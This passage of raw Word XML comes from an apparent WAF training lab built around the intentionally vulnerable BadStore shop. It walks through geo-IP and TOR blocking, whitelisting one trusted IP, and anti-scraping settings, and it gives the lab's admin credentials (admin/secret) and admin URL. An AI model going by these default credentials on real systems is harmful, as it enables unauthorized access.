          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="3A5F6C58" w:rsidP="3DB4835F" w:rsidRDefault="3A5F6C58" w14:paraId="24F82966" w14:textId="02DBB6CE">
      <w:pPr>
        <w:pStyle w:val="Quote"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="3A5F6C58">
        <w:rPr/>
        <w:t xml:space="preserve">Note: While not necessary, and this is not a step in this lab, if you are doing further testing and if you wish to clear out the comments for further testing, you can login as the admin user </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="3A5F6C58">
        <w:rPr/>
        <w:t>( admin</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="3A5F6C58">
        <w:rPr/>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="3A5F6C58">
        <w:rPr/>
        <w:t>secret )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="3A5F6C58">
        <w:rPr/>
        <w:t xml:space="preserve"> go to  /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="3A5F6C58">
        <w:rPr/>
        <w:t>badstore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="3A5F6C58">
        <w:rPr/>
        <w:t xml:space="preserve">.cgi?action=admin and reset the comments. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3A21" w:rsidRDefault="005F3A21" w14:paraId="50F60801" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F90E1A" w:rsidP="00F90E1A" w:rsidRDefault="00F90E1A" w14:paraId="3950A76D" w14:textId="15ED7033">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Beyond the OWASP Top 10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0000459B" w:rsidRDefault="0045382E" w14:paraId="3D304543" w14:textId="4CECCD2A">
      <w:r w:rsidR="005F3A21">
        <w:rPr/>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00F96BE0">
        <w:rPr/>
        <w:t xml:space="preserve">pplication security </w:t>
      </w:r>
      <w:r w:rsidR="00F90E1A">
        <w:rPr/>
        <w:t xml:space="preserve">goes </w:t>
      </w:r>
      <w:r w:rsidR="00BB1043">
        <w:rPr/>
        <w:t xml:space="preserve">much </w:t>
      </w:r>
      <w:r w:rsidR="00F90E1A">
        <w:rPr/>
        <w:t xml:space="preserve">further </w:t>
      </w:r>
      <w:r w:rsidR="00BB1043">
        <w:rPr/>
        <w:t xml:space="preserve">than </w:t>
      </w:r>
      <w:r w:rsidR="00F63ABA">
        <w:rPr/>
        <w:t xml:space="preserve">SQL Injection and XSS and the </w:t>
      </w:r>
      <w:r w:rsidR="00BB1043">
        <w:rPr/>
        <w:t>OWASP Top 10</w:t>
      </w:r>
      <w:r w:rsidR="00F63ABA">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0000459B" w:rsidRDefault="0045382E" w14:paraId="62CD420C" w14:textId="04E1BEB2">
      <w:r w:rsidR="42C3196E">
        <w:rPr/>
        <w:t xml:space="preserve">Also included in Application Security are </w:t>
      </w:r>
      <w:r w:rsidR="00F96BE0">
        <w:rPr/>
        <w:t>defen</w:t>
      </w:r>
      <w:r w:rsidR="2850C309">
        <w:rPr/>
        <w:t>ses</w:t>
      </w:r>
      <w:r w:rsidR="00F96BE0">
        <w:rPr/>
        <w:t xml:space="preserve"> against </w:t>
      </w:r>
      <w:r w:rsidR="0000459B">
        <w:rPr/>
        <w:t>Bot</w:t>
      </w:r>
      <w:r w:rsidR="00F96BE0">
        <w:rPr/>
        <w:t xml:space="preserve"> attacks, </w:t>
      </w:r>
      <w:r w:rsidR="0000459B">
        <w:rPr/>
        <w:t>Account Take Ove</w:t>
      </w:r>
      <w:r w:rsidR="00F96BE0">
        <w:rPr/>
        <w:t>rs</w:t>
      </w:r>
      <w:r w:rsidR="0000459B">
        <w:rPr/>
        <w:t>, and</w:t>
      </w:r>
      <w:r w:rsidR="005E5001">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005E5001">
        <w:rPr/>
        <w:t>more.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidP="50C40F79" w:rsidRDefault="003972D7" w14:paraId="44EA3723" w14:textId="36F25407">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="003972D7">
        <w:rPr/>
        <w:t>Geolocation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00605DE7" w:rsidP="50C40F79" w:rsidRDefault="007D01EA" w14:paraId="59E1BC4A" w14:textId="1BA98F80">
      <w:pPr>
        <w:pStyle w:val="Quote"/>
      </w:pPr>
      <w:r w:rsidR="7B01683B">
        <w:rPr/>
        <w:t>We</w:t>
      </w:r>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t xml:space="preserve"> only do business with US and UK. Can you block all other countries? </w:t>
      </w:r>
      <w:r w:rsidR="025AA802">
        <w:rPr/>
        <w:t>We</w:t>
      </w:r>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t xml:space="preserve"> also want to block TOR nodes</w:t>
      </w:r>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t xml:space="preserve"> and anonymous proxies</w:t>
      </w:r>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00605DE7" w:rsidR="007D01EA" w:rsidP="00605DE7" w:rsidRDefault="7A98A0B1" w14:paraId="6EDB2B4A" w14:textId="79899C01">
      <w:r w:rsidR="7A98A0B1">
        <w:rPr/>
        <w:t>Look</w:t>
      </w:r>
      <w:r w:rsidR="15E0CB9B">
        <w:rPr/>
        <w:t xml:space="preserve"> at the available components in WAFaaS </w:t>
      </w:r>
      <w:r w:rsidR="00B2651A">
        <w:rPr/>
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="15E0CB9B">
        <w:rPr/>
        <w:t>block web requests outside of the US and UK.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="007D01EA" w:rsidRDefault="007D01EA" w14:paraId="25BE37B5" w14:textId="4072B7E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Add the </w:t>
      </w:r>
      <w:r w:rsidRPr="32965056">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IP Address Geolocation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> component</w:t>
      </w:r>
      <w:r w:rsidR="1586DAB5">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1586DAB5" w:rsidP="21B1CB40" w:rsidRDefault="1586DAB5" w14:paraId="63C6D1E2" w14:textId="52608122">
      <w:r w:rsidR="1586DAB5">
        <w:drawing>
          <wp:inline wp14:editId="7F8FDFFF" wp14:anchorId="19A91872">
            <wp:extent cx="4791145" cy="2124075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="420279602" name="Picture 420279602" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 420279602"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R26a7e2d86e3b49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91145" cy="2124075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="007D01EA" w:rsidRDefault="007D01EA" w14:paraId="59849F4E" w14:textId="5359D4AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t xml:space="preserve">In the Geo IP Filter card, move all countries </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="007D01EA">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">except </w:t>
      </w:r>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t>United States and United Kingdom to the Blocked side.</w:t>
      </w:r>
      <w:r w:rsidR="4266A2AE">
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="751F03F9">
        <w:rPr/>
        <w:t>Note: If you are located in another country, you may wish to add it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="007D01EA" w:rsidRDefault="007D01EA" w14:paraId="4F6FC872" w14:textId="1D77613D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Turn on blocking for TOR Nodes and Anonymous Proxies.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="007D01EA" w:rsidR="007D01EA" w:rsidP="007D01EA" w:rsidRDefault="007D01EA" w14:paraId="07DA250D" w14:textId="4D34B56F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t>Click Save.</w:t>
      </w:r>
      <w:r w:rsidR="57C0ED41">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0CFF0B51" w:rsidRDefault="0CFF0B51" w14:paraId="2AD24BCC" w14:textId="7CFBF1B9">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63ABA" w:rsidP="007D01EA" w:rsidRDefault="00F63ABA" w14:paraId="0C805AF3" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="50C40F79" w:rsidRDefault="003972D7" w14:paraId="220C8D24" w14:textId="4C212CAD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="003972D7">
        <w:rPr/>
        <w:t>Allow Trusted Clients</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="50C40F79" w:rsidRDefault="007D01EA" w14:paraId="3F2D05B2" w14:textId="20E3B3B5">
      <w:pPr>
        <w:pStyle w:val="Quote"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="6A783427">
        <w:rPr/>
        <w:t>We</w:t>
      </w:r>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t xml:space="preserve"> have an anti-defacement service that accesses the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t>store</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="2B241EEE">
        <w:rPr/>
        <w:t xml:space="preserve">we </w:t>
      </w:r>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t>want it to be exempt from all WAF checks</w:t>
      </w:r>
      <w:r w:rsidR="1B722F6C">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t>and be able to do anything unconditionally</w:t>
      </w:r>
      <w:r w:rsidR="264EE83A">
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t>The service always sends requests from the IP 38.227.79.50</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="50C40F79" w:rsidRDefault="771C133F" w14:paraId="619A5F6E" w14:textId="0DE1ABB9">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Arial" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="50C40F79" w:rsidR="771C133F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Arial" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Look </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="4CE0FD67">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Arial" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">at the available components in WAFaaS to see what would </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="394A2234">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Arial" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>allow requests from a specific IP to be always “trusted”.</w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="00D412E1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Arial" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="4A129D53">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Arial" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> Note: You may need </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="00D412E1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Arial" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">to circle back to the “IP Address Geolocation” component and add this </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="50C40F79" w:rsidR="00D412E1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Arial" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="50C40F79" w:rsidR="00D412E1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Arial" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> address as an allowed address under the “Network Exceptions” section, so that if that IP address falls outside the UK and USA, it is still allowed. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="50C40F79" w:rsidP="50C40F79" w:rsidRDefault="50C40F79" w14:paraId="1DC9DDB8" w14:textId="02165E01">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="007D01EA" w:rsidRDefault="007D01EA" w14:paraId="15DE336D" w14:textId="486930E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Add the </w:t>
      </w:r>
      <w:r w:rsidRPr="32965056">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Trusted Hosts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> component.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3A943E86" w:rsidP="21B1CB40" w:rsidRDefault="3A943E86" w14:paraId="266DA2F8" w14:textId="351E17CA">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidR="3A943E86">
        <w:drawing>
          <wp:inline wp14:editId="0AD3533B" wp14:anchorId="1C6F963A">
            <wp:extent cx="5334002" cy="1352550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1680396535" name="Picture 1680396535" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 1680396535"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R222cfb16dfbb44c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4002" cy="1352550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="007D01EA" w:rsidRDefault="007D01EA" w14:paraId="5699A015" w14:textId="6F0A25BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Enable Trusted Hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="007D01EA" w:rsidRDefault="007D01EA" w14:paraId="07D0A2DB" w14:textId="20C25557">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Click Add Host. Enter the IP 38.227.79.50 and mask 255.255.255.255.  Enter “Anti_Defacement” for the </w:t>
      </w:r>
      <w:r w:rsidR="39837D8E">
        <w:t>name and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> click Add.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="008218E2" w:rsidR="003B36F2" w:rsidP="3DB4835F" w:rsidRDefault="007D01EA" w14:paraId="5FAFEC90" w14:textId="6DF6F34C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t>Click Save</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3DB4835F" w:rsidRDefault="3DB4835F" w14:paraId="490953B5" w14:textId="68327595">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE1F9B" w:rsidP="00DE1F9B" w:rsidRDefault="003972D7" w14:paraId="334AA67C" w14:textId="082DCA20">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Web Scraping</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE1F9B" w:rsidP="3DB4835F" w:rsidRDefault="00DE1F9B" w14:paraId="3C5C6F4B" w14:textId="3D78148C">
      <w:pPr>
        <w:pStyle w:val="Quote"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="57F199AA">
        <w:rPr/>
        <w:t>Note: We will not be finding or testing this vulnerability, but we will be enabling the appropriate WAFaaS component to defend against this type of attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE1F9B" w:rsidP="3DB4835F" w:rsidRDefault="00DE1F9B" w14:paraId="5B98B6A0" w14:textId="5F90E718">
      <w:pPr>
        <w:pStyle w:val="Quote"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="1D5C6CA3">
        <w:rPr/>
        <w:t>Our</w:t>
      </w:r>
      <w:r w:rsidR="00DE1F9B">
        <w:rPr/>
        <w:t xml:space="preserve"> competitor, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DE1F9B">
        <w:rPr/>
        <w:t>TerribleStore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DE1F9B">
        <w:rPr/>
        <w:t xml:space="preserve">, started selling the same things and whenever </w:t>
      </w:r>
      <w:r w:rsidR="0CAFC560">
        <w:rPr/>
        <w:t>we</w:t>
      </w:r>
      <w:r w:rsidR="00DE1F9B">
        <w:rPr/>
        <w:t xml:space="preserve"> change </w:t>
      </w:r>
      <w:r w:rsidR="744DB32B">
        <w:rPr/>
        <w:t xml:space="preserve">our </w:t>
      </w:r>
      <w:r w:rsidR="00DE1F9B">
        <w:rPr/>
        <w:t xml:space="preserve">prices, their prices are almost immediately 1 cent cheaper than </w:t>
      </w:r>
      <w:r w:rsidR="5735B98E">
        <w:rPr/>
        <w:t>ours</w:t>
      </w:r>
      <w:r w:rsidR="00DE1F9B">
        <w:rPr/>
        <w:t xml:space="preserve">!  How do they do that?  How do </w:t>
      </w:r>
      <w:r w:rsidR="187B746E">
        <w:rPr/>
        <w:t>we</w:t>
      </w:r>
      <w:r w:rsidR="00DE1F9B">
        <w:rPr/>
        <w:t xml:space="preserve"> stop them?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE1F9B" w:rsidP="00DE1F9B" w:rsidRDefault="00DE1F9B" w14:paraId="468D48AA" w14:textId="6A5A3874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="00DE1F9B">
        <w:rPr/>
        <w:t>The competitor is using a Web Scraper to scrape our customer’s price list</w:t>
      </w:r>
      <w:r w:rsidR="4B261D74">
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidP="50C40F79" w:rsidRDefault="009F0E5E" w14:paraId="4DD95AD7" w14:textId="7AF40566">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="00DE1F9B">
        <w:rPr/>
        <w:t xml:space="preserve">Add the Distributed Denial-of-Service component.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidP="50C40F79" w:rsidRDefault="009F0E5E" w14:paraId="69CC6720" w14:textId="15CDFAAF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="00DE1F9B">
        <w:rPr/>
        <w:t>Choose Web Scraping</w:t>
      </w:r>
      <w:r w:rsidR="008354EB">
        <w:rPr/>
        <w:t xml:space="preserve">, turn on “insert hidden links” and “insert </w:t>
      </w:r>
      <w:r w:rsidR="008354EB">
        <w:rPr/>
        <w:t>Javascript</w:t>
      </w:r>
      <w:r w:rsidR="34573EE1">
        <w:rPr/>
        <w:t>"and</w:t>
      </w:r>
      <w:r w:rsidR="34573EE1">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00787005">
        <w:rPr/>
        <w:t>click Save.</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="009638F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009638F5">
        <w:drawing>
          <wp:inline wp14:editId="64E01986" wp14:anchorId="67B68169">
            <wp:extent cx="2965450" cy="1609136"/>
            <wp:effectExtent l="0" t="0" r="635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025c3153f9c4f2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65450" cy="1609136"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidP="50C40F79" w:rsidRDefault="009F0E5E" w14:paraId="3124FAB4" w14:textId="11CD2FED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="008218E2">
        <w:rPr/>
        <w:t xml:space="preserve">Web Page </w:t>
      </w:r>
      <w:r w:rsidR="008A4FBA">
